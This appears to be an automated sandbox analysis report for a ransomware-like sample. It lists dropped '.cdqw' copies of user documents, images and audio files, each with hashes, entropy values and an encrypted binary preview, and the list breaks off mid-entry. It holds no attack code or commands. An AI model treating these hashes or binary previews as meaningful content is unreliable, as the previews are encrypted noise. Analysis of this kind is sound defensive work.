                                                                                                                                                                      Preview:BPMLN..|.g.#&.uq.G#....Q`.3.'...=`i..dg'.}..g:.Yn...,/...`5......z.}&r..6n....5....../.T...7...r.+..7b.[ha.......*....q0Yj.[...y2....)..f......q.>(....8Vl_......E.U..kl.Q;.. XL2./.1.8..k.0..N.........#..H..h.2.0x._t...g.........._.Y...`........^..........<.U:..;.&47..4...b.5b}"....O...G ..a}...'.R...B.w..g@....|......yf|u.PBo6~.xC.*.R.C6.=....A.....;.1...tbI".".'...RS.;Nk. \.ju....v.].......@..%W.e.....=s."...G^..b?.<m#....VMq.&..:%.@..h..pG.r^..).......k..T..ve..G:V...C_.....\........%.../Qo..C(..,bd..|....3.Z...>s3-s0.0JJ.>o.._.O....(...*...F..k.......y~.?.....8..C..(E&dI["0c.....e6coe..w...<P.{.;N....b.......pd..w.Q.[.=..z0..r.".(.Ky;.#E..yr...d.T...|C+\.*_..=.v.~..qN.....^gL](.....N............c[}s._.......o...M.y.E..d.+.v.nR....z..6U{.?._B.u....P!.Z......mU$.5].V.}..7wW.i.@.`.&.]....E...ba.}.A..1.....Y.....r..2<.....".G....!....G#..dy..h.=;".Q.[.$@..g..^.A..?..4>..1...-u..7.............v:H....1.N.@!1..?..|.#.>..\... "...gE.o.F....w

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\CULUOHOPZT.mp3.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.827457872276762
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:3guTfUInW6ZQLWPvUI85auvr/I1G9Llf0HjML2AnvdNwfOhT2bD:3guwOVh0I81vrw1u0HodvgrD
                                                                                                                                                                      MD5:9E24E12F70B98ECAFDCB4C226B416338
                                                                                                                                                                      SHA1:08EA82A1A64D608C3E6D6E236F2B49B4C81121B7
                                                                                                                                                                      SHA-256:E34BEB612EFA72C53B80468627B8B9538FD8752AD8E78E7CA8F4D16A0F3077CD
                                                                                                                                                                      SHA-512:07AD6C7316AB07832CE547A207BE530EFE9C5B4B0CFD1D16F5575B5A1B5FE17D03881574D5841C193BCF4978680842E27A638B50485873A56E92633CC7ADBAB4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:CULUO.h=M. .7..o....E.=:!.g.RSZ&vy.r.Wt.....d........>,.R. ...._..%0x.....(V;....9..^.7..^W.6..}.GV._&.....p....[0./G..b.....e:w>.x...X....:.&R.........z...{pL..2...5,'..{..n.5.ZU....\.+WnCZ.d.q..,...."\.<..T.i.4.Py.p.A.V........E...z.8\.(.?..1...Fa...T9.y'V.P.J.y.'..J.X..0}0.Q.8.l.p.......Q.....9..s..J...Cj.<l....\zE".\.O:.9.@.}......H.1..T.mIBw....}q....Q.J.........;ov.#..o....VYv<.a...ob......:....,W.....[7....~..?..x..........c..]..\...L.P...0..x].-]..&...kd-d..qCbQ.....)...I.Z.....s:..\ ......$..^.?..;--...Q..[...<....H9<.....;.{...Pc..Gi.....kE.:.+..c...ny[k....D....S....y..z.Y.V^7j.x..y.......U....u`9{....|.{.D-.....m..h.)6..^#..!bQ...%+....5..",.J..s.FG.M...M.."...TW.ww,......x........t..s<G..TG.....t.G.Ic-<..).2. ..W.m.d..t........z..>...@.;3..|.m.<.p...;->..7.'\|.O...FV.. W...#O......k...iRjh..F?.ky.=i........!/.b...fE...EW..s.....b.Q.6'-i........S^l...zh...W.j..E...u.%.s......2.TA..S$.AG...}v.L...WU..).o...G)|w.L....B).U.T.r.

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\DQOFHVHTMG.jpg.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.866417280022411
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:9yITJeI70HLCBpErZb+AeUDDxHi0S1+yC8AUI6CJTLiP65FU0fr042bD:9yITbkLjeH7C8fCJTLiC5SBD
                                                                                                                                                                      MD5:306DF649CAC4335A7F0F92621F9A0BFB
                                                                                                                                                                      SHA1:6966E2AFEFE066F90930ECC06A65E56E23ABD8F0
                                                                                                                                                                      SHA-256:E199C107BCB3B70A8ABCC33AAC05ADCD9456D4240F653857A27488F7F2D3C039
                                                                                                                                                                      SHA-512:6526CAD20B97CBEDA904AAC8AC30BA32DDA96EF8199BDDD2CD50AED981EEE269A4B1877FEAA80ACEA4FBA94AFC799F51CCE4804D66A80308903A1220AF7DA792
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:DQOFHJ)....so...k4....T=....3..h......[.|.E....!...un..o.C...>$f.$|..i.d..2c.[..T.....J.6i.A...P......./.W.g.{.-...9O.....:9../.'.l.S....m0*..Hg,...v.. ..P..to...,.:.p.y.1...U..O.q@.4.S...Y..uKw....).....O*z.D.g..L;{.N>.Qm.=..u,lJ8e.T..........B....F1@;4.....x.80..u...43G......4O.....k.'}...).NP._.K.'.B.p.....%7i...^..V..c..Si..".......N..2..K~..Q.#~...7...*......V._..+U.........~13B..8q..L*....;.........I.Pml..k...{..y..+|.D...&.J@.`.;...k%.0.Hqq@<C...U..Q.;`..m..JST)....X.v.s.@'....=....*W..(........H..`.....?u..H.4k..l.,B.....]CBn>...j.F.%....q..vVW.l.S.BW[.q...|..&....d..M.|...k. w......B}B>..^.................#]z.....Q...x....O.. ^{....C..;nS...c.q..I...,....iK.d.N.*.\P*..EXZ#3...a...hN...R..K.o!.[.o....0..`._HN....^{Jf.).v.....jv!.LU.M{.+.......}...KF.m`7$}.V..2.d......d`&.py.......'./;..T[0../t..n.....X&_&.[..1c.xXRHe._.C.....kt...l...Gl?:b..(!..GT.f?..=..E.....$.U..B..8.?B.r.i@...Z9.\6....9r}.T;J.g...5.......8eh|....Lw..^..C.j.....{H....

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\DQOFHVHTMG.xlsx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.860151179216443
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Yo0+qMOhhkbKfoA36PLgGcjWBj0pwXiY6g3KYwEKikRFrpCY0B+9gK1WftyI2bD:YoqhhUPLVqWBj0OXR6g3KYjKlTpCYhD
                                                                                                                                                                      MD5:208018ADE71CBE8C3B2B60B96BDBB279
                                                                                                                                                                      SHA1:2D161CF12B5758F3777A1D844C4BDA085B5ABB1C
                                                                                                                                                                      SHA-256:5AAD5317457846B1DC1FAB0F16265B00224AE97A886D1749F524C8DFAA352C63
                                                                                                                                                                      SHA-512:7414841666906D7031F81877F7FEB3E08F88CEA716AA72B9A7A0A6D5F01B215360C898DE996F2F8905DC76C88F955161EA81B00DBCBA979837BFA59DCCE322AC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:DQOFHsd.'.q......'.../.Ag..x....J@.[....g.F.e.........p*.8-*.....N. ....](.*\.ao'3.Y>.qG..%u.4>.B........rB. ..."x........5..L....a.:......x.....z....t9.J.*..r..f...$.........t.....+Y........1J...N.i..$F..}E.^@...=.'&.....b.-.u.s..4./......... .u.D0..-.H.......k:#.....6!.T!q..}\...7...Z$.U!.m.0.1.v.mhJ.C@.p|.qR#...AV._."?^.|8...4Gj....l...(........H.t<..H.a...p./....X..f.?w...p.%..D........M..F.c...}H25..<.4Z..Wy.M..).uAX.C?..?...(@.7...R@..0.Y6Z..k.W......=...gZp..H.zE.5.1.....I...]"..*....%.p...........j.t..\M....S.s.0FkFl0... ;`.i.....C....7eN.{..o....!.-.[....T&...@.o.g........p2.xf.:.F....B.u..P.Q/).....j........Hv........"G.......+.?........}..z.U. .\:7...n .E\y......H.O.97.Rc..l.^OH.j.....+...M.9.'.ILh. J.{.Cm....v.(=o.../ .5P.`........D~....nC.b... .....C"..H..;#1I&1di...%u5..`.:....-".T..@.....j..>.S4..9.R.?......#Ft...Y|.......F.0...[....p..#......$...9q.T'9.pD0[..Cf....G.....y.F.)4....Q.T...[.lb.......zT.\.../...x'...

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\DUUDTUBZFW.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.859402777328497
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:7+dMKQIxZqcOHQmwMysQIDBztqnDZRET8syFsiSb9jv62bD:kMDcHiqIfqDb5sySX9vxD
                                                                                                                                                                      MD5:491E872D8C64ECB781E45192481C1A37
                                                                                                                                                                      SHA1:4E6EB949B7F4DD64AD87349B1CE3CA7F24993C84
                                                                                                                                                                      SHA-256:48AC6BD059D088FD463FA07BB7A4D4ABDEE9CB9A2C7F0D9EC2F7DBC779EEECBA
                                                                                                                                                                      SHA-512:3ED7F334FD3728F2C571B15D459A8B2EF49BBC63E1AE4B959101D5A66290AD65636A5948AC1BD9843F87E8BBBF583A87F317E431708E1604E4DB3E4CEEF75F33
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:DUUDTRaU..~i..a..L}..Q..p.6a...0.%.t!h..l....@E`...G.Q..L.mk..X.&.ch.....N.6....j.v..n..r....A....L....#.Z..F.T..q.a...#..S..tf..1.A.......$GH.'..........K...G.(g.v/.2.|2.,..waF.....d....:...@ .x3...wl<....5..t.bv.......X.2.L.-....Z...~..'\K.w5....<....W.*WF5j...9.i..Ez.Q.U.L..7;.aFI...#....[....F.......Glz.9..FKVdw..\.z..^.............s:..pi(Id;...."..u......R,..j.i.0.......Q.;&...a@ ..+.......hn..c....C.....xxV...bR.J+.$y,.....U.....R\...L..7K.....I.p.v.../.3..Z...`a*...e.*..c(..Y..a~.h.d.YQ....3A..-..........A....-kD..?k.*.......:'.;.C,.Zq.lw..,(..J.......C.`g;...c\.P.t$..".w.h........H..\.?{.#..........:Q....*.l..w..?4[...2..~<......>hd..@..BF2A.y.J.>q.A.3.s....O%s.....0...* B."~th...8#..7Q...5....g.{..y.j4f..{h5..^$Y......X.g/^...".-.......L.8(.6.....M.....Em..)....i..|.jBkg).q.-..$......g..0....8..=..@B{..'.G.s.!W..[..gf...L!A.j.....~..&.......{/.4..Q..~......-..<c...o.cN.F...[..../..g.[.v..H..9.6...WZ.......C..W>.@.(.wj.

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\ERWQDBYZVW.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.848784568338874
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:XcqtTxIlxjfZzAy3ydCqVVXqMsZvcLMmBMM/f6G3ZlgIcvomOqtm9yg2bD:vFIlxhwd36EBBMM/JZlwv6m4GD
                                                                                                                                                                      MD5:67F905D779567D075B9B6A113AD44C6E
                                                                                                                                                                      SHA1:2DF13139209419DA0BDDA8493F07D1B00267E5D5
                                                                                                                                                                      SHA-256:4DE4277BEEF08AAB83881A2966F3F38899013BE56458F8539317F8E3DFE67E0A
                                                                                                                                                                      SHA-512:9B4F918369F0DEC8FCD03746A872EE0BDF440A331661AA07AB43FCA680EE5EBA7DA329B47855C8E1195AF5F9C0C5449E0994F2C3236A9F4AA226F6C215D20296
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:ERWQD.Gs[..sz.`C.9..o/..W..G..Q1C..WfHBVo-}..Y......B..=%..r<..\.....Q.....d...qU.^.....!......9HA........(....".;...D.V..>"U....!!2%..Jg.X....Pz.^...2).U.n.c...H.j[.....gF.7.....xs.L.......N...G..z3.iK^....u'.E.YE..WE]..Z`+..r7....................D=....4...,......Qk.-..'..i;.<^nt4.k...5.!{^........>.c..|wf..?..#.\....{....6...*l.....5~q.)...x...^........\..l.. ..HMt0..|.. .......!x.c.s....n..E...9...)..\)..K...)..b...:..&kv.S0[.+...&.!.../Y..{CQ&.'.!=...{._.z.}.X}..LA....!h.KV=...HoV`. h................Nx.=....Yb+.kY....z..]Z.........V.X...,g..N.......jJ..[.; D....}gc......{../.d.Z.r_|..I.2%d....EO.Ilx.H8....J>O48..8e.v....%.i..x..e*.........F....m4.....K.lq?.x......3.../.{.B....C.K...Sq..\.........d.Gh.:a..K..[.w...`.B... ...^6.........B..R.s..6$s...SC...;.Y!-.I.K..9..t..o@.....C...yF.OJv).`............O...p.[.}...~+.o..(..F:..10C.&...L.h..K.=R........r.}...jW.!A..].W......w.....(.Yl..;2.V).3..{"`R4|.D..>.~^..sbw..Q....2...^..L.

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\FAAGWHBVUU.pdf.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.851465413244001
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:uA5hOJlQa4O8kqUYS60xwuM71rlX6BCIz6iuxUoTqB+2bD:PKgwqJsIvX6BzAGD
                                                                                                                                                                      MD5:D95F12F25E6DC5C4F53C44F144C29AED
                                                                                                                                                                      SHA1:F60705932B5234C286D6744470C3212E52D2BDB6
                                                                                                                                                                      SHA-256:EA4BE21967A4DD715602834F9853206454C8DAC8DB3C926A31CBA60E867E77A6
                                                                                                                                                                      SHA-512:8B0BEE2DB683A01031AC197CDB314E8CDCC1DACA5557310B11580F5342A882759D8C05D3867C8BB604A3580FB64B3191C4568D65A4B1FF487A7D7C1AD736041D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:FAAGW.j@._(.....o..o.........H..4...g}T..q.iq.L$.Y...4OV....V...Y......^(L[..........Yk&...(..G.Od.....v..pAH.4.Dw{u.Q ....i.._.cT)d.$.c.W^.L.>...D.|......'T..)...d..yN....o....6...H~.......[.3....ix....5a.m..........b....7S..ndg....ly....%:....]s."......d{%c.....1..D.~4!R...9.[. .Z...P=}.P..1,:.H.....{U.,.%.yv...M..y...#[...o.:..<P+..;u,....:.Hz. TAw6..4...$....q_(.........d......+i.A^....r.)..J..Q..Z.d<......'..d3....B.B...X..-.e.Q.e.s.T..sV({......?~....3..P}..B...s......7.d..K.....[.Z..-..>u.A<.....D".....:L...B.......0..8<.O....~u.Z.Ql).b1...1.p<..@...+D...I7T.iP|.P.vy..3."...x..".....DF....z...........nw.F..|..@.G...8.esB1.Dt..a[...z.|S.......~.!8..8p.e'A....B.s..rbu......>>...H......6...,[n-.%...(...+ W.Z1W.....F.<..d9..7..V..l...Sn...l..[.~.........3....5~[H...)..%.^...q.H)../>h...B....Z.'..fA.Y...7...eZ......c.K.n?..j.2\..k....N.$.4.R.........X.5.s.h..^X%..>.....o_Q....:%(....8Dek.....o.E.......\pe.OQ>........;\Y....9.....

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\FENIVHOIKN.docx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.86727791606907
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:KV6LdwGGaGbaeuL2rw73q4ZLy960GWTi5UgNw2hDDrCplzfbRIeF2bD:W6R3NGZuL2rw733Ze9Qsi59W2hDDWpli
                                                                                                                                                                      MD5:6A8F99FB38386CA13D19A3D4B7CB41F1
                                                                                                                                                                      SHA1:4BF5DAD42E2BD5984FEEA7BDA0DF8A018C2ABAD2
                                                                                                                                                                      SHA-256:DCD215FD77617111875490450B77C9E7663AD65578C91D6777EC37D9311CDE08
                                                                                                                                                                      SHA-512:6523EF603030AF2EF32700A0683BDB8CC337A2D8E1167B5D99D00A81B035F4B6C4F888F1192C0A229726C27AD986CDE929EED94E10AE5ACBB46E0C0766559472
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:FENIVM..).t.)..z..D$<.w..!_`..Y......`]c.....?=+R.V.......n;.Y1..%%.r<<hF.e.7..w....X.B...wx.._...$2....U..s112.c....=Y...u...,....5.$sz...oA..v.v...Bt.....P}P=7r...Ql&.J..}VI.O.@.1HYW"p.p....o}..8... ...++..K.......r.R9G..3q+...4..+...k......QV..E...Q]..........i\+.k=.;.?....v.$U..E.....Y....O....*..d..f.......[9..H..* .K.j..s^.C..{.@...U."DX...(.5..;...J...C.a8......k.\.S..C.`.p.B.S7syM2........@#B......,..6T.......t.'.......D.....t~...w5.O............|....#.|......:...u....".t.h.o...-....k...lu[.I.!..n.seS.;C.....<..A.Z._V.....i.I46.''e..I.........K..^.L=.j..=..F....0..O~.<..K..m...Y.?.b.M4...'....../.q.6....}.6..R.u.92d.E...d.`8b.7..Dv.Y./22..N.W.Q....F.>....~pW..h......l..bY.[.. >.lw....1....h.P[6\...C)........m.H8..}5...%V.MG.m...Y.<....{$.3..i.6..@..}#D.C..,g.9.#...:..T.7.'!.N.sG.a....{*Hu.+.5.......<.!,.!gw..Z!....o.e6Q..m.....a..v...<.e..v4z....!:......2u)ei.*"7@Q.....{e...?..Y..-.^.2gc....+5.q.(.D.?........................,....c_....

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\FENIVHOIKN.mp3.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.829450412266599
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:eIIWFJLkhX79ilbGEQ+0gECwA6Ry1zDr5G1z7QIrExyW4LJyIdjAho2bD:eTeGhJQNJ0ZCh641zxGBJAx2JyIdjAhX
                                                                                                                                                                      MD5:1636BDE2FFBB38E05F6FBFAFE7B2C8F8
                                                                                                                                                                      SHA1:0DF7325C44539F8C597BE23C67D6F201A91BC041
                                                                                                                                                                      SHA-256:5A3E08068B486C0AC17EA966B3B733D174A39873E14F98291C2E8A8391952E2E
                                                                                                                                                                      SHA-512:FD93469D1C535728AFA45D093B2727529F8EBF1BAD027EAA8CB53A862C5A940517DC3E5FF3F62C3C6D5AC55BC970EBF183C9384442FA53F46273E7B09BA3CA75
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:FENIV..V.A..K.H.^.......9.Z..&....qs..........)."('......s..gZ-&..o...n~N.......s...vjF....b.}.g...C?l."....G..V.....".............C.}xD.{=BZ....".A..)h...Z.@a.....?s...U..,7-.FQ.P.:...C....A..d...h".g...r`...*........=.F......4.3i.x.G.XU.9....|-.%.....U..%.^..!.6jKk"..[zU.|.....N2<....LvR..H..a.-s.q0.....a.U.N.....Uk.Bw.+.......Y.$..b%.e..d<..Z.^c..Qo..@......\*.de.Jg.._n....N..f.N...@\.-%>L.......AV.d..~...`i..y.P..1+.z....\.p.....+i}x#...F.Q?r.I....9y6]..^..<..... .u.*..r..zKIZ}<.~.<..A.Pb...kQ.c........3..GA....@O3,9..u..`...3C.k&.g..;._.M.?N.......)t....p.n..\.LL...s^..H.....8.zq...mD&5"f.......R..9F..s.,7.:...y..DG?..#..Z...B........qB/4.n1....xF.....w.#H...H.(q..1.....)*Z..hp.{G......U+........Kh-...n....R....,.I.Y..1.....R..b..N..%..P.o...2.......?..O....=......R.e<o."..F#.O..+.,...O?.(...>.J...........w..5.LQG.!xn...c9...v.....v.)..iL..&`vo.)f.n(z.k...Z....J....j..b..12.m....9.#....^...8?..V...xvE.m+L.x. ..'Q.S.GT...

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\FENIVHOIKN.xlsx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.841898267567028
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:T6oAPqDT7/CwxdYAccNzXeNOOMc5Q5bolbZzxmS44SxmVU/86xZvkECs6JUx053a:TqqDnqwxyAc6Xc25boJZdmShCE6xZnHN
                                                                                                                                                                      MD5:D94FBC97D87A36170AC1528FEBD61C50
                                                                                                                                                                      SHA1:0ADA6D29B53529659544A4DBB0A97F22F6A9C3BE
                                                                                                                                                                      SHA-256:40E5289FD269D236A4FF13CBF37F01C5898C9B413CF97D26CEBB0543F85A186C
                                                                                                                                                                      SHA-512:D5503F47283FB555BFF5CCFA0AC2EB0BF638C4C0568769FE4A090D05DC0A134820E1413B4E39B4C89E5611A55921345EB6E8CDBC4FAB22F896A0920BA7B1DAE2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:FENIVf.$..oJ........V %.1.....=9.....u...1..$.....fnM."..ET..4.....v.{.e.Dw.c=...k6&..{n......7t.....o...D.<.T...=..v....M...2E\*.7 W..!_:U-}..t..-.N...Q4K....yUD...<..8.....+.{u...uc8..2.U........b......} k..,.).+.. .&I..."RJu.3...O.f0..r...f..j.....J..U|{..q.55D...LK...s^LN...i...9.J..B].p.;...}.....?..4Z.L...(.:.cm.6A2..u!.4.._.A..=j..0\.b.....o.$.7..c+.*..f...h...H$..z.....t.....W.KwZT2.h..p......P....akP/e..b....(D2c..)\.......Z.....i}.....&?..O^.;..y.Y.;!....4.hD./;...u.$."Y0BI3,"u.T.D.Qaf.,....C...o\.....e`....c...W2'a..#!;..T..O..2.h....1.G.s.B..OPEme@r.MHc....Z.c-=6+matU...n..W:..|............=.5Mu.;...+.Z.ho{V.9w.D.....WZ.i._.X..dzv.N+.!..S8e.G.4..rP}.0....1..."......Ph./.T...B.9.n..*..r.....!..ul.TSL;..Xu.....!Y.k.....4...w.%...........U..+..A.....5..$.i*..d=_@Z.....'5.S........\..H.....n.8...8..H2R.w(x.%;.Y.#u......4Fr...mo.m....>^....2@'i3.......!..G.3....?.g.$!.....".V....k..w.b.`>..RP......R.....e........&~..6.a.8.....i"..?.t.u..

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\HTAGVDFUIE.mp3.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.85182226381783
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:g/DXiEjt9DvuuQ1vQ0cuW0CMfCadN/u10ddmNGxI5UWFQ6oFOf2bD:6WEHGuQnC0CKCadNvBZQ8D
                                                                                                                                                                      MD5:459962ED9B5FE957B51E0B8BBD44776D
                                                                                                                                                                      SHA1:E63BB722548F7C111CA39A15453BDBA99BF83EE5
                                                                                                                                                                      SHA-256:6A9C53C74986FDE1BCE774678FD5BA7A6C55B8120FAF71D3A098609E781CC6FE
                                                                                                                                                                      SHA-512:44F4E1CF9C76CCC1BECB60E2EA4B6D7BD47B5441E0CE2ADB21751A779F9E164B1B9365A06C292003AEFEC3696B65C921DBD293174DF7CAD2363FBA1A324E473C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:HTAGV.........t....a35w-...M....,.f..DL%.>!.9n#x..'. .['...Y...3v.R.9r.V...'.v.P....^?..K...^........}s..Y.R.[xe)...s....].2...:.8.y.0+.0o......Y..R..........a.t...y_.#4......-.....~......3j.q.<\.<X........v.....i..P....@!....b1./T.v.o.XB@.E....@.O..a...@6....}-~.....+e.Z|R?.qp..G.Z9.........7l...5./17......'..&z..+.M..*.......y6.v...z\.A..r(.j.F.)...}4..}....6...:..g.v....$f.d.s#...".......<`....U...k.nPAX.@%ON..K.Yn@.?...T.&]... ^o.P....]....:e.%sZ%..|.[...S...y..N../.<...3du..Q.U4Z$A...oN.......XZ.-....V.$V..8..H.`.@3.....Y.uz.}..S..J...........[.q.9.....f.^.-]...$...>;.m.D.6..9..........U.][.T'.&.u..h..;.O...Y8q+.-E(.T.JB.y*..t.H.a.F%& .2.IE..L2...d..zkd.c...d.AC.......A.*O..L.......4.@...%&/vO....s.I......L20m'...o.._...\AH..w.2C..b...$..X,[X.T...o...t(..9Y.'A.2..[.E.....Js.....rS.7..l...6<.a9...(.......u.........g.V......=..u..g1\.|.c~.j.<....4....)..c.lf.I...22-.-(....G..S..jC.&Y....EE.I.HG.}...*....+N..TK....c.%mnW........I..

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\HTAGVDFUIE.pdf.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.861164382262813
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:o2c97fQFJdmhWYf7K2Fs6Qz52vPx1Sq2NsfCUX92moLo0hw6piGp8lGx2bD:o2c9U5lYjK8s6QN2v312KfzALoHuBp8B
                                                                                                                                                                      MD5:ED13FC8C00E2AE7A6BE35B66FA969342
                                                                                                                                                                      SHA1:8A1A294F09D3C4983155B80A1CEA5BB37C783B5A
                                                                                                                                                                      SHA-256:7609375681B3AAEDFA07373F83A0EB5D9449FD01DCE0DB084010423B1EFF6B39
                                                                                                                                                                      SHA-512:E41A5A6B5A505388D7B5D72D5516C22B363E5040ED6F9E30C40A80AD93F911928827DF3D9ABF632768A3558F69B888C726AACACD659B70CE60ED0B6756BAA8D4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:HTAGV{..y.!...../..2a...Vs..[t...E.~{a.H....@.G..cv`p..\..l5....K..V.\h2..q.R..c.......*..).a.OIx.`.......t.!.y[...5M..U.$w..I.......-.U.v.'........V*.+8.WrQ..u...&w@....."./Q'.?m..~N4....E.....W...Bt.1..uc...g"].wk!.F.;.5.fhN.g...~..e,..#..S..b._R....`.. ..q;...MX.....<..Bz......x..\..H..`....1i..P-...f..Ls>...'cv...td.l..4;.x../E..i...u..n..H...g...v.2....u....Fy 9.th.C).......Gz.:.E.(|V.D.b......(O..j...s.j.3..0...C.O...G....'.._.xc....F.o.S.d..|2rG p.V.....Y!Ig...H....V,8..w..\...=2...W.....6=...I...vT......6g.eP-.L.$....[..a.....0G`.vS..o...k.9.n.....b.).$.]...).H.6..Ll..L..o...H .)a\...X.04......t.+k...*...s.y.[...{5n{I.Q.....=Vtp...yY$...>h[....U}.....m.=.....I.J.}.....+.Q....'......[....95.y:.....O..c...C.$?)....D.`<Z..7.v...A.bA..o...`.a....Y...Qr._..NG).Xm..i!.D.........rhJ..h.._....O...5Z..../..M....k..a._.b.bN.}lcC...c......w.]...uL#..@[.`H..t._..we7.0;WzN.%."?.u.~..FhEv..I.W-..wB4..bRp._...t..*.J....{../...'.EOT....B4

                                                                                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\HTAGVDFUIE.xlsx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.865374575799541
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:u9DYLarZ8QUbc/aoL5MWhfemJMsU8mujh3Ae9hzUuK6rf8AxB8Hp4IAWLpU2AwpP:2Drt4ho9vEmJu8jQuzUuNr0Ucp4nWLpt
                                                                                                                                                                      MD5:F2AF4032C0B0AB7319C0EDA34546AAF0
                                                                                                                                                                      SHA1:C62775D1F6CBD57E251191D35FB557581FEAB8A6
